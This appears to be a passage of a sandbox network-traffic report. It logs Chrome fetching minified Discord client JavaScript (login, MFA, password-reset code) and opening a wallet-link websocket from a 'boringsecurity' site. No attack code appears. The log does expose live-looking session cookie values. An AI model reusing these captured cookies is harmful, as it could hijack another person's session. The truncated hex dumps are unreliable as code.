                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 20 30 20 32 35 20 34 38 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 32 2e 36 30 31 34 20 32 32 2e 31 30 30 33 43 32 30 2e 34 34 33 32 20 32 30 2e 36 38 35 35 20 31 38 2e 36 30 36 37 20 31 38 2e 38 33 32 36 20 31 37 2e 32 31 31 32 20 31 36 2e 36 36 31 38 43 31 35 2e 38 31 35 37 20 31 34 2e 34 39 31 31 20 31 34 2e 38 39 32 35 20 31 32 2e 30 35 31 31 20 31 34 2e 35 30 31 34 20 39 2e 35 30 30 32 38 4c 31 33 2e 32 30 31 34 20 30 2e 37 30 30 32 37 37 43 31 33 2e 31 35 35 33 20 30 2e 34 39 37 36 32 34 20 31 33 2e 30 34 30 34 20 30 2e 33 31 37 31 37 39 20 31 32 2e 38
                                                                          Data Ascii: 0 25 48",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,n.jsx)("path",{d:"M22.6014 22.1003C20.4432 20.6855 18.6067 18.8326 17.2112 16.6618C15.8157 14.4911 14.8925 12.0511 14.5014 9.50028L13.2014 0.700277C13.1553 0.497624 13.0404 0.317179 12.8
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 3a 65 2c 66 6f 72 63 65 55 73 65 43 6f 6c 6f 72 46 6f 72 53 70 61 72 6b 6c 65 73 3a 6c 3d 21 31 2c 73 68 6f 75 6c 64 49 6e 68 65 72 69 74 54 65 78 74 43 6f 6c 6f 72 3a 61 3d 21 31 2c 73 68 6f 75 6c 64 49 6e 68 65 72 69 74 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 69 3d 21 31 7d 3d 74 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 29 28 75 2e 64 65 66 61 75 6c 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 66 6f 72 63 65 55 73 65 43 6f 6c 6f 72 3a 6c 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 29 28 73 2e 54 65 78 74 42 61 64 67 65 2c 7b 64 69 73 61 62 6c 65 43 6f 6c 6f 72 3a 21 30 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 28 64 2e 74 61 67 2c 7b 5b 64 2e 69 6e 68 65 72 69 74 54 65 78 74 43 6f 6c 6f 72 5d 3a 61 2c 5b 64 2e 69 6e 68 65 72 69 74 42 61
                                                                          Data Ascii: :e,forceUseColorForSparkles:l=!1,shouldInheritTextColor:a=!1,shouldInheritBackgroundColor:i=!1}=t;return(0,n.jsx)(u.default,{className:e,forceUseColor:l,children:(0,n.jsx)(s.TextBadge,{disableColor:!0,className:r(d.tag,{[d.inheritTextColor]:a,[d.inheritBa
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 6f 6e 73 3a 41 7d 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 29 2c 52 3d 28 30 2c 75 2e 75 73 65 41 70 70 43 6f 6e 74 65 78 74 29 28 29 2c 76 3d 52 3d 3d 3d 43 2e 41 70 70 43 6f 6e 74 65 78 74 2e 50 4f 50 4f 55 54 2c 5b 79 2c 50 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 77 3d 6e 75 6c 6c 21 3d 68 3f 4d 61 74 68 2e 6d 61 78 28 28 30 2c 63 2e 67 65 74 4e 75 6d 62 65 72 4f 66 41 70 70 6c 69 65 64 42 6f 6f 73 74 73 4e 65 65 64 65 64 46 6f 72 54 69 65 72 29 28 72 2c 68 29 2c 31 29 3a 31 2c 78 3d 28 30 2c 63 2e 67 65 6e 65 72 61 74 65 42 6c 6f 63 6b 47 75 69 6c 64 53 75 62 73 63 72 69 70 74 69 6f 6e 50 75 72 63 68 61 73 65 73 4e 6f 64 65 29 28 29 2c 4e 3d 61 73 79 6e 63 28 29 3d 3e 7b 50 28 21 30 29 2c 61 77 61 69 74 20 28 30 2c 66 2e 61 64 64 41 70
                                                                          Data Ascii: ons:A}=(0,o.default)(),R=(0,u.useAppContext)(),v=R===C.AppContext.POPOUT,[y,P]=a.useState(!1),w=null!=h?Math.max((0,c.getNumberOfAppliedBoostsNeededForTier)(r,h),1):1,x=(0,c.generateBlockGuildSubscriptionPurchasesNode)(),N=async()=>{P(!0),await (0,f.addAp
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 73 74 73 54 6f 41 64 64 3a 68 2c 6f 6e 43 6c 6f 73 65 3a 6d 2c 63 6c 6f 73 65 4c 61 79 65 72 3a 49 2c 6f 6e 53 75 62 73 63 72 69 70 74 69 6f 6e 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 3a 4c 2c 67 75 69 6c 64 3a 53 2c 68 61 6e 64 6c 65 53 75 62 73 63 72 69 62 65 4d 6f 64 61 6c 43 6c 6f 73 65 3a 54 2c 64 69 73 61 62 6c 65 50 72 65 6d 69 75 6d 55 70 73 65 6c 6c 3a 45 2c 69 6e 50 6f 70 6f 75 74 3a 67 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 41 7d 3d 74 2c 52 3d 67 3f 61 2e 50 4f 50 4f 55 54 5f 4d 4f 44 41 4c 5f 43 4f 4e 54 45 58 54 3a 61 2e 44 45 46 41 55 4c 54 5f 4d 4f 44 41 4c 5f 43 4f 4e 54 45 58 54 2c 76 3d 75 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 55 73 65 72 28 29 3b 69 66 28 6e 75 6c 6c 3d 3d 76 29 72 65 74 75 72 6e 3b 69 66 28 21 76
                                                                          Data Ascii: stsToAdd:h,onClose:m,closeLayer:I,onSubscriptionConfirmation:L,guild:S,handleSubscribeModalClose:T,disablePremiumUpsell:E,inPopout:g,applicationId:A}=t,R=g?a.POPOUT_MODAL_CONTEXT:a.DEFAULT_MODAL_CONTEXT,v=u.default.getCurrentUser();if(null==v)return;if(!v
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 4d 4f 44 41 4c 5f 44 49 53 4d 49 53 53 45 44 2c 7b 74 79 70 65 3a 70 2e 41 6e 61 6c 79 74 69 63 73 50 61 67 65 73 2e 50 52 45 4d 49 55 4d 5f 47 55 49 4c 44 5f 55 53 45 52 5f 4d 4f 44 41 4c 2c 6c 6f 63 61 74 69 6f 6e 5f 73 65 63 74 69 6f 6e 3a 5f 2e 73 65 63 74 69 6f 6e 7d 29 7d 2c 74 6f 74 61 6c 4e 75 6d 62 65 72 4f 66 53 6c 6f 74 73 54 6f 41 73 73 69 67 6e 3a 6e 75 6c 6c 21 3d 68 3f 68 3a 31 2c 6f 6e 43 6c 6f 73 65 4d 6f 64 61 6c 3a 78 2c 64 69 73 61 62 6c 65 50 72 65 6d 69 75 6d 55 70 73 65 6c 6c 3a 45 2c 6f 6e 53 75 62 73 63 72 69 70 74 69 6f 6e 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 3a 4c 2c 69 6e 50 6f 70 6f 75 74 3a 67 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 41 7d 29 7d 7d 2c 31 36 33 37 33 32 3a 66
                                                                          Data Ascii: .AnalyticEvents.MODAL_DISMISSED,{type:p.AnalyticsPages.PREMIUM_GUILD_USER_MODAL,location_section:_.section})},totalNumberOfSlotsToAssign:null!=h?h:1,onCloseModal:x,disablePremiumUpsell:E,onSubscriptionConfirmation:L,inPopout:g,applicationId:A})}},163732:f
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 68 50 61 79 6d 65 6e 74 53 6f 75 72 63 65 73 29 28 29 2c 28 30 2c 73 2e 66 65 74 63 68 50 72 65 6d 69 75 6d 53 75 62 73 63 72 69 70 74 69 6f 6e 50 6c 61 6e 73 29 28 29 5d 29 3b 6c 65 74 20 41 3d 61 77 61 69 74 20 28 30 2c 61 2e 6f 70 65 6e 4d 6f 64 61 6c 4c 61 7a 79 29 28 61 73 79 6e 63 28 29 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 74 7d 3d 61 77 61 69 74 20 6c 2e 65 6c 28 22 38 36 30 36 33 34 22 29 2e 74 68 65 6e 28 6c 2e 62 69 6e 64 28 6c 2c 22 38 36 30 36 33 34 22 29 29 3b 72 65 74 75 72 6e 20 6c 3d 3e 7b 6c 65 74 7b 74 72 61 6e 73 69 74 69 6f 6e 53 74 61 74 65 3a 61 2c 6f 6e 43 6c 6f 73 65 3a 72 7d 3d 6c 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 29 28 74 2c 7b 74 72 61 6e 73 69 74 69 6f 6e 53 74 61 74 65 3a 61 2c 6f 6e 43 6c 6f 73 65 3a 74 3d
                                                                          Data Ascii: hPaymentSources)(),(0,s.fetchPremiumSubscriptionPlans)()]);let A=await (0,a.openModalLazy)(async()=>{let{default:t}=await l.el("860634").then(l.bind(l,"860634"));return l=>{let{transitionState:a,onClose:r}=l;return(0,n.jsx)(t,{transitionState:a,onClose:t=
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 7c 7c 74 2e 74 72 69 61 6c 49 64 3d 3d 3d 69 2e 50 52 45 4d 49 55 4d 5f 54 49 45 52 5f 32 5f 33 50 5f 4f 4e 45 5f 4d 4f 4e 54 48 5f 54 52 49 41 4c 5f 49 44 7c 7c 74 2e 74 72 69 61 6c 49 64 3d 3d 3d 69 2e 50 52 45 4d 49 55 4d 5f 54 49 45 52 5f 32 5f 52 45 46 45 52 52 41 4c 5f 54 52 49 41 4c 5f 49 44 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65 74 20 74 3d 28 30 2c 6e 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 29 28 5b 72 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 50 72 65 6d 69 75 6d 54 79 70 65 53 75 62 73 63 72 69 70 74 69 6f 6e 28 29 29 2c 65 3d 28 30 2c 6e 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 29 28 5b 61 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 61 2e 64 65 66 61 75 6c 74 2e
                                                                          Data Ascii: ||t.trialId===i.PREMIUM_TIER_2_3P_ONE_MONTH_TRIAL_ID||t.trialId===i.PREMIUM_TIER_2_REFERRAL_TRIAL_ID);function d(){let t=(0,n.useStateFromStores)([r.default],()=>r.default.getPremiumTypeSubscription()),e=(0,n.useStateFromStores)([a.default],()=>a.default.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          258192.168.2.549994162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/67079.8c773b08bd63e44275b8.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Pvcmd6a6.0o4HjOJPmeojkgEm6NiaF1BbolJHbj9VMY-1702226711747-0-604800000
                                                                          2023-12-10 16:45:12 UTC1130INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 30 32 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 38 39 65 30 35 37 34 37 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: application/javascriptContent-Length: 23022Connection: closeCF-Ray: 8336f4f89e05747f-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 37 30 37 39 22 5d 2c 7b 34 33 37 38 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 65 74 20 73 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 50 61 73 73 77 6f 72 64 52 65 73 65 74 52 65 73 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 2c 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 38 36 30 36 37 37 22 29 2c 6e 28 22 35 30 36 30 38 33 22 29 3b 76 61 72 20 6f 2c 6c 2c 61 3d 6e
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["67079"],{437822:function(e,t,n){"use strict";let s;n.r(t),n.d(t,{PasswordResetResult:function(){return o},default:function(){return v}}),n("70102"),n("860677"),n("506083");var o,l,a=n
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 6f 67 69 6e 4d 65 74 68 6f 64 3a 6e 75 6c 6c 21 3d 6f 26 26 22 22 21 3d 3d 6f 3f 4e 2e 4c 6f 67 69 6e 4d 65 74 68 6f 64 73 2e 4c 4f 47 49 4e 5f 43 4f 44 45 3a 4e 2e 4c 6f 67 69 6e 4d 65 74 68 6f 64 73 2e 50 41 53 53 57 4f 52 44 7d 29 2c 74 68 69 73 2e 73 65 74 4c 6f 67 69 6e 43 72 65 64 65 6e 74 69 61 6c 73 28 6e 2c 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 21 3d 73 3f 73 3a 6f 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 76 6f 69 64 20 30 29 2c 4f 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 4e 2e 45 6e 64 70 6f 69 6e 74 73 2e 4c 4f 47 49 4e 2c 62 6f 64 79 3a 7b 6c 6f 67 69 6e 3a 6e 2c 70 61 73 73 77 6f 72 64 3a 73 2c 75 6e 64 65 6c 65 74 65 3a 6c 2c 6c 6f 67 69 6e 5f 63 6f 64 65 3a 6f 2c 6c 6f 67 69 6e 5f 73 6f 75 72 63 65 3a 69 2c 67 69
                                                                          Data Ascii: oginMethod:null!=o&&""!==o?N.LoginMethods.LOGIN_CODE:N.LoginMethods.PASSWORD}),this.setLoginCredentials(n,null!==(t=null!=s?s:o)&&void 0!==t?t:void 0),O.default.post({url:N.Endpoints.LOGIN,body:{login:n,password:s,undelete:l,login_code:o,login_source:i,gi
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 67 69 6e 4d 46 41 76 32 28 65 29 7b 6c 65 74 20 74 2c 7b 63 6f 64 65 3a 6e 2c 74 69 63 6b 65 74 3a 73 2c 73 6f 75 72 63 65 3a 6f 2c 67 69 66 74 43 6f 64 65 53 4b 55 49 64 3a 6c 2c 69 73 4d 75 6c 74 69 41 63 63 6f 75 6e 74 3a 69 2c 6d 66 61 54 79 70 65 3a 64 7d 3d 65 3b 72 65 74 75 72 6e 20 74 3d 22 77 65 62 61 75 74 68 6e 22 3d 3d 3d 64 3f 4e 2e 45 6e 64 70 6f 69 6e 74 73 2e 4c 4f 47 49 4e 5f 57 45 42 41 55 54 48 4e 3a 22 73 6d 73 22 3d 3d 3d 64 3f 4e 2e 45 6e 64 70 6f 69 6e 74 73 2e 4c 4f 47 49 4e 5f 53 4d 53 3a 4e 2e 45 6e 64 70 6f 69 6e 74 73 2e 4c 4f 47 49 4e 5f 4d 46 41 2c 4f 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 74 2c 62 6f 64 79 3a 7b 63 6f 64 65 3a 6e 2c 74 69 63 6b 65 74 3a 73 2c 6c 6f 67 69 6e 5f 73 6f 75 72 63 65 3a 6f 2c 67
                                                                          Data Ascii: ginMFAv2(e){let t,{code:n,ticket:s,source:o,giftCodeSKUId:l,isMultiAccount:i,mfaType:d}=e;return t="webauthn"===d?N.Endpoints.LOGIN_WEBAUTHN:"sms"===d?N.Endpoints.LOGIN_SMS:N.Endpoints.LOGIN_MFA,O.default.post({url:t,body:{code:n,ticket:s,login_source:o,g
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 56 4f 49 50 5f 54 4f 4b 45 4e 29 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 2c 74 72 61 63 6b 65 64 41 63 74 69 6f 6e 44 61 74 61 3a 7b 65 76 65 6e 74 3a 61 2e 4e 65 74 77 6f 72 6b 41 63 74 69 6f 6e 4e 61 6d 65 73 2e 55 53 45 52 5f 4c 4f 47 4f 55 54 7d 2c 2e 2e 2e 6e 75 6c 6c 21 3d 6e 26 26 7b 68 65 61 64 65 72 73 3a 7b 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3a 6e 75 6c 6c 21 3d 3d 28 65 3d 69 2e 64 65 66 61 75 6c 74 2e 67 65 74 54 6f 6b 65 6e 28 6e 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 22 22 7d 7d 7d 29 2e 66 69 6e 61 6c 6c 79 28 28 29 3d 3e 7b 28 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 3d 3d 3d 41 2e 64 65 66 61 75 6c 74 2e 67 65 74 49 64 28 29 29 26 26 79 28 74 29 7d 29 7d 2c 73 77 69 74 63 68 41 63 63 6f 75 6e 74 54 6f 6b 65 6e 28 65 29
                                                                          Data Ascii: VOIP_TOKEN)},oldFormErrors:!0,trackedActionData:{event:a.NetworkActionNames.USER_LOGOUT},...null!=n&&{headers:{authorization:null!==(e=i.default.getToken(n))&&void 0!==e?e:""}}}).finally(()=>{(null==n||n===A.default.getId())&&y(t)})},switchAccountToken(e)
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 4e 61 6d 65 73 2e 41 55 54 48 4f 52 49 5a 45 5f 50 41 59 4d 45 4e 54 7d 7d 29 2c 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 56 45 52 49 46 59 5f 53 55 43 43 45 53 53 22 7d 29 7d 63 61 74 63 68 28 65 29 7b 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 56 45 52 49 46 59 5f 46 41 49 4c 55 52 45 22 2c 65 72 72 6f 72 73 3a 7b 7d 7d 29 7d 7d 2c 61 73 79 6e 63 20 61 75 74 68 6f 72 69 7a 65 49 50 41 64 64 72 65 73 73 28 65 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 7b 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 56 45 52 49 46 59 5f 46 41 49 4c 55 52 45 22 2c 65 72 72 6f 72 73 3a 7b 7d 7d 29 3b 72 65 74 75 72 6e 7d 74 72 79 7b 61 77 61 69 74 20 4f 2e 64 65 66 61 75 6c
                                                                          Data Ascii: Names.AUTHORIZE_PAYMENT}}),u.default.dispatch({type:"VERIFY_SUCCESS"})}catch(e){u.default.dispatch({type:"VERIFY_FAILURE",errors:{}})}},async authorizeIPAddress(e){if(null==e){u.default.dispatch({type:"VERIFY_FAILURE",errors:{}});return}try{await O.defaul
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 22 2c 65 72 72 6f 72 3a 6e 65 77 20 63 2e 56 36 4f 72 45 61 72 6c 69 65 72 41 50 49 45 72 72 6f 72 28 65 29 7d 29 2c 65 7d 7d 2c 61 73 79 6e 63 20 72 65 73 65 74 50 61 73 73 77 6f 72 64 4d 46 41 76 32 28 65 29 7b 6c 65 74 7b 6d 65 74 68 6f 64 3a 74 2c 63 6f 64 65 3a 6e 2c 74 69 63 6b 65 74 3a 73 2c 70 61 73 73 77 6f 72 64 3a 6f 2c 74 6f 6b 65 6e 3a 6c 2c 73 6f 75 72 63 65 3a 69 7d 3d 65 3b 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 47 49 4e 5f 4d 46 41 22 7d 29 3b 6c 65 74 20 64 3d 61 77 61 69 74 20 4f 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 4e 2e 45 6e 64 70 6f 69 6e 74 73 2e 52 45 53 45 54 5f 50 41 53 53 57 4f 52 44 2c 62 6f 64 79 3a 7b 63 6f 64 65 3a 6e 2c 74 69 63 6b 65 74 3a 73 2c 70 61 73 73
                                                                          Data Ascii: ",error:new c.V6OrEarlierAPIError(e)}),e}},async resetPasswordMFAv2(e){let{method:t,code:n,ticket:s,password:o,token:l,source:i}=e;u.default.dispatch({type:"LOGIN_MFA"});let d=await O.default.post({url:N.Endpoints.RESET_PASSWORD,body:{code:n,ticket:s,pass
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 2c 61 3b 69 66 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 73 29 2c 6e 75 6c 6c 3d 3d 53 2e 64 65 66 61 75 6c 74 2e 67 65 74 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 43 6f 6e 73 65 6e 74 52 65 71 75 69 72 65 64 28 29 29 7b 6c 65 74 20 74 3d 6e 75 6c 6c 3d 3d 3d 28 6c 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 6f 3d 65 2e 62 6f 64 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 63 6f 6e 73 65 6e 74 5f 72 65 71 75 69 72 65 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 7c 7c 6c 3b 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 53 45 54 5f 43 4f 4e 53 45 4e 54 5f 52 45 51 55 49 52 45 44 22 2c 63 6f 6e 73 65 6e 74 52 65 71 75 69 72 65 64 3a 74 7d 29 7d 69 66 28 75 2e 64 65 66 61 75
                                                                          Data Ascii: ,a;if(clearTimeout(s),null==S.default.getAuthenticationConsentRequired()){let t=null===(l=null==e?void 0:null===(o=e.body)||void 0===o?void 0:o.consent_required)||void 0===l||l;u.default.dispatch({type:"SET_CONSENT_REQUIRED",consentRequired:t})}if(u.defau
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 6f 28 22 6d 6f 64 61 6c 22 29 2c 73 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 3f 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3a 76 6f 69 64 20 30 2c 6c 3d 28 30 2c 61 2e 67 65 74 52 6f 6f 74 4e 61 76 69 67 61 74 69 6f 6e 52 65 66 29 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 6c 26 26 6c 2e 69 73 52 65 61 64 79 28 29 3f 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 50 72 6f 6d 69 73 65 3f 65 2e 74 68 65 6e 28 65 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 20 74 7d 29 3a 65 28 29 29 2e 74 68 65 6e 28 65 3d 3e 74 68 69 73 2e 70 75 73 68 28 65 2c 74 2c 6e 2c 73 29 29 3a 6e 65 77 20 50 72 6f 6d 69 73 65 28 6f 3d 3e 64 2e 64 65 66 61 75 6c 74 2e 65 6e 71 75 65 75 65 28 28 29 3d 3e 6f 28 74 68 69 73 2e 70 75 73 68 4c 61
                                                                          Data Ascii: o("modal"),s=arguments.length>3?arguments[3]:void 0,l=(0,a.getRootNavigationRef)();return null!=l&&l.isReady()?(e instanceof Promise?e.then(e=>{let{default:t}=e;return t}):e()).then(e=>this.push(e,t,n,s)):new Promise(o=>d.default.enqueue(()=>o(this.pushLa
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 75 73 65 50 72 6f 6d 6f 45 6d 61 69 6c 43 6f 6e 73 65 6e 74 53 74 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 73 3d 6e 28 22 33 30 38 35 30 33 22 29 3b 6c 65 74 20 6f 3d 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 28 29 3d 3e 28 7b 72 65 71 75 69 72 65 64 3a 21 31 2c 63 68 65 63 6b 65 64 3a 21 31 2c 70 72 65 43 68 65 63 6b 65 64 3a 21 31 7d 29 29 2c 6c 3d 65 3d 3e 7b 6f 2e 73 65 74 53 74 61 74 65 28 65 29 7d 2c 61 3d 65 3d 3e 7b 6f 2e 73 65 74 53 74 61 74 65 28 7b 63 68 65 63 6b 65 64 3a 65 7d 29 7d 2c 69 3d 6f 7d 2c 37 36 34 39 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c
                                                                          Data Ascii: tion(){return a},usePromoEmailConsentStore:function(){return i}});var s=n("308503");let o=(0,s.default)(()=>({required:!1,checked:!1,preChecked:!1})),l=e=>{o.setState(e)},a=e=>{o.setState({checked:e})},i=o},76493:function(e,t,n){"use strict";n.r(t),n.d(t,


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          259192.168.2.549993104.18.37.84435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC503OUTGET /rpc HTTP/1.1
                                                                          Host: www.walletlink.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: U94YTUq5nYuZCsRsJDBrtA==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
